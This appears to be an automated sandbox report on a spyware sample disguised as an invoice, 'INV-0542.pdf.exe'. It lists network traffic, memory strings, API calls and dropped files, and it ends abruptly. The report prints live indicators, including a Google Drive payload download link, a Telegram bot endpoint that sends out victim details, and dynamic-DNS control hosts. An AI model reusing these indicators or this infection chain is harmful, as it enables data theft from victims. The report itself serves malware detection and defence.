Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 25 Nov 2024 17:44:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000002.00000002.2412724868.00000000029B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro=
Source: INV-0542.pdf.exe, INV-0542.pdf.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2413511774.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2413511774.00000000047D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20a
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021A50000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A41000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021A4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/$E
Source: msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/lBW
Source: msiexec.exe, 00000005.00000002.3301201948.0000000020E80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_
Source: msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_6_
Source: msiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_f
Source: msiexec.exe, 00000005.00000002.3286405273.0000000000779000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2540711816.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000005.00000002.3286405273.0000000000779000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2540711816.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/U
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3286405273.0000000000767000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3286405273.000000000074C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_&export=download
Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000005.00000002.3302092440.000000002194E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.00000000218DE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000005.00000002.3302092440.00000000218DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021909000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.000000002194E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021A81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000005.00000002.3302092440.0000000021A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBjq

Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49870 version: TLS 1.2

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

Code function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405705

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: INV-0542.pdf.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe

Jump to dropped file

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040351C

Source: C:\Users\user\Desktop\INV-0542.pdf.exe	File created: C:\Windows\resources\0809			Jump to behavior
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	File created: C:\Windows\huzzah.lnk			Jump to behavior

Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Code function: 0_2_00406C5F	0_2_00406C5F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_072BC496	2_2_072BC496
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_0039E988	5_2_0039E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00395370	5_2_00395370
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00397118	5_2_00397118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_003929EC	5_2_003929EC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00399E81	5_2_00399E81
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE5FD8	5_2_23EE5FD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE6678	5_2_23EE6678
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE3FE8	5_2_23EE3FE8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEF5E8	5_2_23EEF5E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE1FE8	5_2_23EE1FE8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE0DE0	5_2_23EE0DE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE87E0	5_2_23EE87E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE6FFA	5_2_23EE6FFA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE1FF8	5_2_23EE1FF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE0DF0	5_2_23EE0DF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE87F0	5_2_23EE87F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEDDF0	5_2_23EEDDF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE9FCC	5_2_23EE9FCC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE5FC7	5_2_23EE5FC7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEB7C0	5_2_23EEB7C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE9FD8	5_2_23EE9FD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE3FD8	5_2_23EE3FD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEF5D7	5_2_23EEF5D7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEB7AF	5_2_23EEB7AF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE2DA8	5_2_23EE2DA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EECFA8	5_2_23EECFA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EECFA7	5_2_23EECFA7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE1BA0	5_2_23EE1BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE7988	5_2_23EE7988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE4D89	5_2_23EE4D89
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE9180	5_2_23EE9180
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE2D9A	5_2_23EE2D9A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE4D98	5_2_23EE4D98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE7998	5_2_23EE7998
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEE790	5_2_23EEE790
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE1B91	5_2_23EE1B91
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEA968	5_2_23EEA968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE0960	5_2_23EE0960
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEE77F	5_2_23EEE77F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE9171	5_2_23EE9171
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE5B48	5_2_23EE5B48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE3B49	5_2_23EE3B49
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEC142	5_2_23EEC142
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE6B40	5_2_23EE6B40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE3B58	5_2_23EE3B58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEA958	5_2_23EEA958
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEC150	5_2_23EEC150
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE0950	5_2_23EE0950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE8328	5_2_23EE8328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EED927	5_2_23EED927
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEF120	5_2_23EEF120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EED938	5_2_23EED938
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE5B39	5_2_23EE5B39
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE6B30	5_2_23EE6B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE290A	5_2_23EE290A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE4908	5_2_23EE4908
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE2918	5_2_23EE2918
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE8318	5_2_23EE8318
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE1710	5_2_23EE1710
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE9B10	5_2_23EE9B10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEF111	5_2_23EEF111
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEB2E8	5_2_23EEB2E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EECAE0	5_2_23EECAE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE16FF	5_2_23EE16FF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE9AFF	5_2_23EE9AFF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEB2F8	5_2_23EEB2F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE48F7	5_2_23EE48F7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE36C8	5_2_23EE36C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEE2C8	5_2_23EEE2C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE04C0	5_2_23EE04C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE04D0	5_2_23EE04D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE74D0	5_2_23EE74D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EECAD1	5_2_23EECAD1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE56A8	5_2_23EE56A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE8CA9	5_2_23EE8CA9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEA4A0	5_2_23EEA4A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEFAA0	5_2_23EEFAA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE36BE	5_2_23EE36BE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE74BF	5_2_23EE74BF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE56B8	5_2_23EE56B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE8CB8	5_2_23EE8CB8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEE2B8	5_2_23EEE2B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEFAB0	5_2_23EEFAB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEA48F	5_2_23EEA48F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE2488	5_2_23EE2488
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEBC88	5_2_23EEBC88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE1280	5_2_23EE1280
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE4468	5_2_23EE4468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE6668	5_2_23EE6668
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE7E60	5_2_23EE7E60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EED460	5_2_23EED460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE4478	5_2_23EE4478
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE2478	5_2_23EE2478
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEBC78	5_2_23EEBC78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EED470	5_2_23EED470
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE1270	5_2_23EE1270
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE9648	5_2_23EE9648
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEEC49	5_2_23EEEC49
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE0040	5_2_23EE0040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEEC58	5_2_23EEEC58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE7E50	5_2_23EE7E50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE322E	5_2_23EE322E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE5228	5_2_23EE5228
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE3238	5_2_23EE3238
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE9637	5_2_23EE9637
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEAE30	5_2_23EEAE30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE0031	5_2_23EE0031
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE7008	5_2_23EE7008
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEC608	5_2_23EEC608
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEDE00	5_2_23EEDE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEAE1F	5_2_23EEAE1F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EE521C	5_2_23EE521C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_23EEC618	5_2_23EEC618

Source: INV-0542.pdf.exe

Static PE information: invalid certificate

Source: INV-0542.pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/16@5/5

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

0_2_0040351C

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

Code function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049B1

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

Code function: 0_2_004021CF CoCreateInstance,

0_2_004021CF

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

File created: C:\Users\user\AppData\Roaming\interpellant

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsf8E9F.tmp

Jump to behavior

Source: INV-0542.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\INV-0542.pdf.exe

